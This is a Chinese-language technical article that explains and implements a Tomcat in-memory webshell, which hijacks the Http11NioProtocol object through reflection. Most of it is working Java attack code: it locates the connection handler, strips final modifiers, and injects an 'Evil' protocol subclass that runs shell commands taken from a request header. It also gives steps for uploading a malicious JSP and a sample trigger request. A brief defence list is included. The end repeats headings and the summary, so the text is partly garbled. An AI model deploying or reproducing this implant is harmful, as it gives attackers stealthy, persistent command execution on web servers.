Http11NioProtocol 内存马技术分析与实现<\/h1>

前言<\/h2>
本文详细分析了一种新型Tomcat内存马技术，通过修改Http11NioProtocol对象实现命令执行。这种内存马具有以下特点：<\/p>
稳定注入调用<\/li>
无痕，不影响正常业务<\/li>
可以实现命令执行回显<\/li> <\/ul>
技术原理<\/h2>

调用链分析<\/h3>
访问Servlet的标准调用链如下：<\/p>
init:12, HelloServlet (com.example.tomcat_demo)
init:158, GenericServlet (javax.servlet)
initServlet:1144, StandardWrapper (org.apache.catalina.core)
loadServlet:1091, StandardWrapper (org.apache.catalina.core)
allocate:773, StandardWrapper (org.apache.catalina.core)
invoke:133, StandardWrapperValve (org.apache.catalina.core)
invoke:96, StandardContextValve (org.apache.catalina.core)
invoke:496, AuthenticatorBase (org.apache.catalina.authenticator)
invoke:140, StandardHostValve (org.apache.catalina.core)
invoke:81, ErrorReportValve (org.apache.catalina.valves)
invoke:650, AbstractAccessLogValve (org.apache.catalina.valves)
invoke:87, StandardEngineValve (org.apache.catalina.core)
service:342, CoyoteAdapter (org.apache.catalina.connector)
service:803, Http11Processor (org.apache.coyote.http11)
process:66, AbstractProcessorLight (org.apache.coyote)
process:790, AbstractProtocol$ConnectionHandler (org.apache.coyote)
doRun:1459, NioEndpoint$SocketProcessor (org.apache.tomcat.util.net)
run:49, SocketProcessorBase (org.apache.tomcat.util.net)
runWorker:1142, ThreadPoolExecutor (java.util.concurrent)
run:617, ThreadPoolExecutor$Worker (java.util.concurrent)
run:61, TaskThread$WrappingRunnable (org.apache.tomcat.util.threads)
run:745, Thread (java.lang)
<\/code><\/pre>
关键注入点<\/h3>
在AbstractProtocol$ConnectionHandler.process()<\/code>方法中，存在以下关键代码：<\/p>
processor.<\/span>setSslSupport<\/span>(<\/span>wrapper.<\/span>getSslSupport<\/span>(<\/span>getProtocol().<\/span>getClientCertProvider<\/span>()));<\/span>
<\/span><\/span><\/code><\/pre>通过控制getProtocol()<\/code>返回的对象，重写getClientCertProvider()<\/code>方法可以实现命令执行。<\/p>
实现步骤<\/h2>
1. 获取AbstractProtocol$ConnectionHandler对象<\/h3>
通过线程遍历获取包含"Acceptor"和"http-nio"特征的线程，进而获取Handler对象：<\/p>
public<\/span> Object getTheHandler<\/span>()<\/span> {<\/span>
<\/span><\/span>    Thread[]<\/span> threads =<\/span> (<\/span>Thread[])<\/span> getField(<\/span>Thread.<\/span>currentThread<\/span>().<\/span>getThreadGroup<\/span>(),<\/span> "threads"<\/span>);<\/span>
<\/span><\/span>    for<\/span> (<\/span>Thread thread :<\/span> threads)<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            if<\/span> (<\/span>thread.<\/span>getName<\/span>().<\/span>contains<\/span>(<\/span>"Acceptor"<\/span>)<\/span> &&<\/span> thread.<\/span>getName<\/span>().<\/span>contains<\/span>(<\/span>"http-nio"<\/span>))<\/span> {<\/span>
<\/span><\/span>                Object handler =<\/span> getField(<\/span>getField(<\/span>getField(<\/span>thread,<\/span> "target"<\/span>),<\/span>"this$0"<\/span>),<\/span>"handler"<\/span>);<\/span>
<\/span><\/span>                return<\/span> handler;<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>            continue<\/span>;<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> new<\/span> Object();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2. 修改final字段<\/h3>
虽然proto<\/code>字段是private final<\/code>，但可以通过反射修改：<\/p>
public<\/span> static<\/span> void<\/span> makeSettable<\/span>(<\/span>Field f)<\/span> {<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        Field modifiersField =<\/span> Field.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"modifiers"<\/span>);<\/span>
<\/span><\/span>        modifiersField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        modifiersField.<\/span>setInt<\/span>(<\/span>f,<\/span> f.<\/span>getModifiers<\/span>()<\/span> &<\/span> ~<\/span>Modifier.<\/span>FINAL<\/span>);<\/span>
<\/span><\/span>        f.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>        throw<\/span> new<\/span> RuntimeException(<\/span>e);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3. 替换proto对象<\/h3>
将原来的proto<\/code>字段替换为恶意的EvilHttp11NioProtocol<\/code>对象：<\/p>
Object obj =<\/span> getTheHandler();<\/span>
<\/span><\/span>Field field =<\/span> obj.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"proto"<\/span>);<\/span>
<\/span><\/span>makeSettable(<\/span>field);<\/span>
<\/span><\/span>field.<\/span>set<\/span>(<\/span>obj,<\/span> new<\/span> EvilHttp11NioProtocol());<\/span>
<\/span><\/span><\/code><\/pre>4. 恶意Http11NioProtocol实现<\/h3>
创建继承自Http11NioProtocol<\/code>的恶意类，重写getClientCertProvider()<\/code>方法：<\/p>
public<\/span> class<\/span> EvilHttp11NioProtocol<\/span> extends<\/span> Http11NioProtocol {<\/span>
<\/span><\/span>    public<\/span> EvilHttp11NioProtocol<\/span>()<\/span> {<\/span>
<\/span><\/span>        super<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> String getClientCertProvider<\/span>()<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            String cmd =<\/span> getCmd(<\/span>getRequest());<\/span>
<\/span><\/span>            System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>cmd);<\/span>
<\/span><\/span>            if<\/span> (!<\/span>cmd.<\/span>equals<\/span>(<\/span>""<\/span>)){<\/span>
<\/span><\/span>                String[]<\/span> cmds =<\/span> System.<\/span>getProperty<\/span>(<\/span>"os.name"<\/span>).<\/span>toLowerCase<\/span>().<\/span>contains<\/span>(<\/span>"windows"<\/span>)<\/span> 
<\/span><\/span>                    ?<\/span> new<\/span> String[]{<\/span>"cmd.exe"<\/span>,<\/span> "\/c"<\/span>,<\/span> cmd}<\/span> 
<\/span><\/span>                    :<\/span> new<\/span> String[]{<\/span>"\/bin\/sh"<\/span>,<\/span> "-c"<\/span>,<\/span> cmd};<\/span>
<\/span><\/span>                byte<\/span>[]<\/span> result =<\/span> new<\/span> java.<\/span>util<\/span>.<\/span>Scanner<\/span>(<\/span>
<\/span><\/span>                    new<\/span> ProcessBuilder(<\/span>cmds).<\/span>start<\/span>().<\/span>getInputStream<\/span>())<\/span>
<\/span><\/span>                    .<\/span>useDelimiter<\/span>(<\/span>"\\A"<\/span>).<\/span>next<\/span>().<\/span>getBytes<\/span>();<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {}<\/span>
<\/span><\/span>        return<\/span> super<\/span>.<\/span>getClientCertProvider<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 获取请求参数
<\/span><\/span><\/span><\/span>    public<\/span> String getRequest<\/span>()<\/span> {<\/span>
<\/span><\/span>        Thread[]<\/span> threads =<\/span> (<\/span>Thread[])<\/span> getField(<\/span>Thread.<\/span>currentThread<\/span>().<\/span>getThreadGroup<\/span>(),<\/span> "threads"<\/span>);<\/span>
<\/span><\/span>        for<\/span> (<\/span>Thread thread :<\/span> threads)<\/span> {<\/span>
<\/span><\/span>            try<\/span> {<\/span>
<\/span><\/span>                if<\/span> (<\/span>thread.<\/span>getName<\/span>().<\/span>contains<\/span>(<\/span>"Acceptor"<\/span>)<\/span> &&<\/span> thread.<\/span>getName<\/span>().<\/span>contains<\/span>(<\/span>"http-nio"<\/span>))<\/span> {<\/span>
<\/span><\/span>                    Object[]<\/span> nioEndpointPollerArrays =<\/span> (<\/span>Object[])<\/span> getField(<\/span>
<\/span><\/span>                        getField(<\/span>getField(<\/span>thread,<\/span>"target"<\/span>),<\/span>"this$0"<\/span>),<\/span>"pollers"<\/span>);<\/span>
<\/span><\/span>                    for<\/span> (<\/span>Object nioEndpointPollerArray :<\/span> nioEndpointPollerArrays){<\/span>
<\/span><\/span>                        Object[]<\/span> channelArrays =<\/span> (<\/span>Object[])<\/span> getField(<\/span>
<\/span><\/span>                            getField(<\/span>nioEndpointPollerArray,<\/span>"selector"<\/span>),<\/span>"channelArray"<\/span>);<\/span>
<\/span><\/span>                        for<\/span> (<\/span>Object obj :<\/span> channelArrays){<\/span>
<\/span><\/span>                            if<\/span> (<\/span>obj !=<\/span> null<\/span>){<\/span>
<\/span><\/span>                                byte<\/span>[]<\/span> bytes =<\/span> (<\/span>byte<\/span>[])<\/span> getField(<\/span>
<\/span><\/span>                                    getField(<\/span>
<\/span><\/span>                                        getField(<\/span>
<\/span><\/span>                                            getField(<\/span>
<\/span><\/span>                                                getField(<\/span>obj,<\/span>"attachment"<\/span>),<\/span>
<\/span><\/span>                                                "socket"<\/span>),<\/span>
<\/span><\/span>                                            "appReadBufHandler"<\/span>),<\/span>
<\/span><\/span>                                        "byteBuffer"<\/span>),<\/span>
<\/span><\/span>                                    "hb"<\/span>);<\/span>
<\/span><\/span>                                return<\/span> new<\/span> String(<\/span>bytes);<\/span>
<\/span><\/span>                            }<\/span>
<\/span><\/span>                        }<\/span>
<\/span><\/span>                    }<\/span>
<\/span><\/span>                }<\/span>
<\/span><\/span>            }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>                continue<\/span>;<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        return<\/span> ""<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 解析命令
<\/span><\/span><\/span><\/span>    public<\/span> String getCmd<\/span>(<\/span>String str){<\/span>
<\/span><\/span>        return<\/span> str.<\/span>substring<\/span>(<\/span>str.<\/span>indexOf<\/span>(<\/span>"ikun"<\/span>)+<\/span>4<\/span>,<\/span> str.<\/span>lastIndexOf<\/span>(<\/span>"ikun"<\/span>));<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>5. 反射工具方法<\/h3>
public<\/span> Object getField<\/span>(<\/span>Object obj,<\/span> String field)<\/span> {<\/span>
<\/span><\/span>    Class clazz =<\/span> obj.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>    while<\/span> (<\/span>clazz !=<\/span> Object.<\/span>class<\/span>)<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            Field declaredField =<\/span> clazz.<\/span>getDeclaredField<\/span>(<\/span>field);<\/span>
<\/span><\/span>            declaredField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            return<\/span> declaredField.<\/span>get<\/span>(<\/span>obj);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>            clazz =<\/span> clazz.<\/span>getSuperclass<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> null<\/span>;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>使用说明<\/h2>
注入方式<\/h3>

将恶意JSP文件上传到服务器<\/li>
访问该JSP文件完成注入<\/li>
后续请求中在HTTP头添加cmd: ikun[command]ikun<\/code>格式的命令<\/li>
<\/ol>
示例HTTP请求：<\/p>
GET \/path\/to\/memshell.jsp HTTP\/1.1
Host: target.com
cmd: ikunnotepadikun
...
<\/code><\/pre>
特点<\/h3>
优点：<\/strong><\/p>

植入后隐蔽性良好<\/li>
不影响正常业务<\/li>
稳定执行命令<\/li>
<\/ul>
缺点：<\/strong><\/p>

获取的是上一次请求的参数<\/li>
目前无法实现回显<\/li>
未在其他Tomcat版本充分测试<\/li>
<\/ul>
防御措施<\/h2>

禁用JSP上传功能<\/li>
监控Tomcat关键类的修改<\/li>
使用安全产品检测内存马<\/li>
定期重启服务清除潜在内存马<\/li>
更新到最新版Tomcat<\/li>
<\/ol>
总结<\/h2>
这种Http11NioProtocol内存马技术通过修改Tomcat核心协议处理对象实现命令执行，具有较高的隐蔽性。安全团队应关注此类新型内存马技术，并采取相应的防御措施。<\/p>
Http11NioProtocol 内存马技术分析与实现<\/h1>

技术原理<\/h2>

使用说明<\/h2>

总结<\/h2> 这种Http11NioProtocol内存马技术通过修改Tomcat核心协议处理对象实现命令执行，具有较高的隐蔽性。安全团队应关注此类新型内存马技术，并采取相应的防御措施。<\/p>

总结<\/h2>
这种Http11NioProtocol内存马技术通过修改Tomcat核心协议处理对象实现命令执行，具有较高的隐蔽性。安全团队应关注此类新型内存马技术，并采取相应的防御措施。<\/p>
